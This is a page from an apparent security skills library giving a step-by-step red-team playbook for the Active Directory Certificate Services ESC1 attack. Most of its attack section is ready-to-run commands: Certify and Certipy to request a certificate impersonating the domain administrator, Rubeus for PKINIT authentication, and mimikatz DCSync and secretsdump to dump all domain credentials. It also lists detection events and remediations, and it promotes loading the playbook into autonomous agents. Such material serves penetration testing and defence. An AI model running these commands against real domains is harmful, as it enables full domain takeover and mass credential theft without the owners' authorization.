CG
SkillsExploiting Active Directory Certificate Services Esc1
Start Free
Back to Skills Library
Red Team & Offensive Security🔴 Advanced

Exploiting Active Directory Certificate Services Esc1

Exploit misconfigured Active Directory Certificate Services (AD CS) ESC1 vulnerability to request certificates as high-privileged users and escalate domain privileges during authorized red team assessments.

4 min read7 code examples5 MITRE techniques

MITRE ATT&CK Coverage

T1649T1558.001T1078.002T1484T1087.002

Exploiting Active Directory Certificate Services ESC1

Overview

ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).

Objectives

  • Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
  • Identify vulnerable ESC1 templates with "Supply in Request" enabled
  • Request a certificate specifying a Domain Admin in the SAN field
  • Authenticate using the forged certificate via PKINIT to obtain a TGT
  • Escalate privileges to Domain Admin using the obtained Kerberos ticket
  • Document the full attack chain for the engagement report

MITRE ATT&CK Mapping

  • T1649 - Steal or Forge Authentication Certificates
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1484 - Domain Policy Modification
  • T1087.002 - Account Discovery: Domain Account

Implementation Steps

Phase 1: AD CS Enumeration

  1. Enumerate Certificate Authority (CA) servers in the domain:

```powershell

# Using Certify (Windows)

Certify.exe cas

# Using Certipy (Linux/Python)

certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1

```

  1. Enumerate all certificate templates and identify vulnerable ones:

```powershell

# Using Certify - find vulnerable templates

Certify.exe find /vulnerable

# Using Certipy - outputs JSON and text reports

certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable

```

  1. Verify ESC1 conditions on identified templates:
  • msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECT
  • pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon
  • msPKI-Enrollment-Flag does not require manager approval
  • Low-privileged group (Domain Users, Authenticated Users) has Enroll rights

Phase 2: Certificate Request with Arbitrary SAN

  1. Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN:

```powershell

# Using Certify (Windows)

Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator

# Using Certipy (Linux)

certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local

```

  1. The CA issues a certificate with the Domain Admin's UPN in the SAN field
  2. Save the output certificate in PFX/PEM format

Phase 3: Authentication with Forged Certificate

  1. Convert the certificate if needed (Certify outputs PEM, convert to PFX):

```bash

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

```

  1. Authenticate using PKINIT to obtain a TGT for the impersonated user:

```powershell

# Using Rubeus (Windows)

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt

# Using Certipy (Linux)

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

```

  1. The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)

Phase 4: Domain Privilege Escalation

  1. With the Domain Admin TGT, perform privileged operations:

```powershell

# DCSync to dump all domain credentials

mimikatz.exe "lsadump::dcsync /domain:domain.local /all"

# Or using secretsdump.py with the obtained NT hash

secretsdump.py domain.local/administrator@DC01.domain.local -hashes :ntlmhash

```

  1. Validate Domain Admin access:

```powershell

# List domain controllers

dir \\DC01.domain.local\C$

# Access Domain Admin shares

dir \\DC01.domain.local\SYSVOL

```

Tools and Resources

ToolPurposePlatform
CertifyAD CS enumeration and certificate requestsWindows (.NET)
CertipyAD CS enumeration, request, and authenticationLinux (Python)
RubeusKerberos authentication with certificates (PKINIT)Windows (.NET)
MimikatzCredential dumping post-escalationWindows
secretsdump.pyRemote credential dumping (Impacket)Linux (Python)
PSPKIAuditPowerShell AD CS auditing moduleWindows
ForgeCertCertificate forgery toolWindows (.NET)

Vulnerable Template Indicators

ConditionVulnerable Value
msPKI-Certificate-Name-FlagENROLLEE_SUPPLIES_SUBJECT (1)
pkiExtendedKeyUsageClient Authentication (1.3.6.1.5.5.7.3.2)
Enrollment RightsDomain Users or Authenticated Users
msPKI-Enrollment-FlagNo manager approval required
CA SettingNo approval workflow enforced

Detection Signatures

IndicatorDetection Method
Certificate request with SAN different from requesterWindows Event 4886 / 4887 on CA server
Unusual PKINIT authenticationEvent 4768 with certificate-based pre-auth
Certify.exe or Certipy executionEDR process monitoring and command-line logging
Mass certificate template enumerationLDAP query monitoring for pkiCertificateTemplate objects
Certificate issued to non-matching UPNCA audit logs and certificate transparency

Validation Criteria

  • [ ] AD CS Certificate Authority enumerated
  • [ ] Vulnerable ESC1 templates identified with Certify or Certipy
  • [ ] Certificate requested with Domain Admin SAN successfully
  • [ ] PKINIT authentication performed with forged certificate
  • [ ] Domain Admin TGT obtained
  • [ ] Privileged access to domain controller validated
  • [ ] Full attack chain documented with evidence
  • [ ] Remediation recommendations provided (disable Supply in Request, require manager approval)

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
  • ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
  • NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
  • NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

# Install via CLI
npx claw-grc skills add exploiting-active-directory-certificate-services-esc1

# Or load dynamically via MCP
grc.load_skill("exploiting-active-directory-certificate-services-esc1")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

// Load this skill in your agent
npx claw-grc skills add exploiting-active-directory-certificate-services-esc1
// Or via MCP
grc.load_skill("exploiting-active-directory-certificate-services-esc1")

Tags

red-teamactive-directoryad-csesc1certificate-abuseprivilege-escalationdomain-escalation

Related Skills

Red Team & Offensive Security

Exploiting Nopac CVE 2021 42278 42287

4m·advanced
Red Team & Offensive Security

Exploiting Constrained Delegation Abuse

4m·advanced
Red Team & Offensive Security

Conducting Internal Reconnaissance with BloodHound Ce

4m·intermediate
Red Team & Offensive Security

Exploiting Active Directory with BloodHound

3m·advanced
Red Team & Offensive Security

Exploiting Zerologon Vulnerability CVE 2020 1472

3m·advanced
Red Team & Offensive Security

Performing Kerberoasting Attack

3m·advanced

Skill Details

Domain
Red Team & Offensive Security
Difficulty
advanced
Read Time
4 min
Code Examples
7
MITRE IDs
5

On This Page

OverviewObjectivesMITRE ATT&CK MappingImplementation StepsTools and ResourcesVulnerable Template IndicatorsDetection SignaturesValidation CriteriaCompliance Framework MappingDeploying This Skill with Claw GRC

Deploy This Skill

Add this skill to your Claw GRC agent and start automating.

Get Started Free →